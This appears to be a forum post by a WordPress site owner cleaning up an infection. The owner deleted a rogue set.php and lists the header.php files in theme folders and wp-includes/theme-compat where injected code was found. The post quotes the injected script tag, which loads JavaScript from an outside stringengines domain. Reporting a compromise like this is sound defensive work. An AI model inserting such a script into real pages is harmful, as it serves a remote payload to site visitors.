This has been haunting me for a few weeks. I did find the set.php on my server and deleted it @happymania so let’s see if that works. I did notice that everywhere there was a header.php on the server it included the code to go to the stringengines url right after the header open parameter.
Code it enjects in
****************
Malicious Code:
<script src=’https : // json . stringengines .com/pson.js?n=1′ type=’text/javascript’></script>
*********
THese are the places I have found the header.php file with the subsequent code:
wp-content/themes/{your theme names} (ONce in all of them)
wp-includes/theme-compat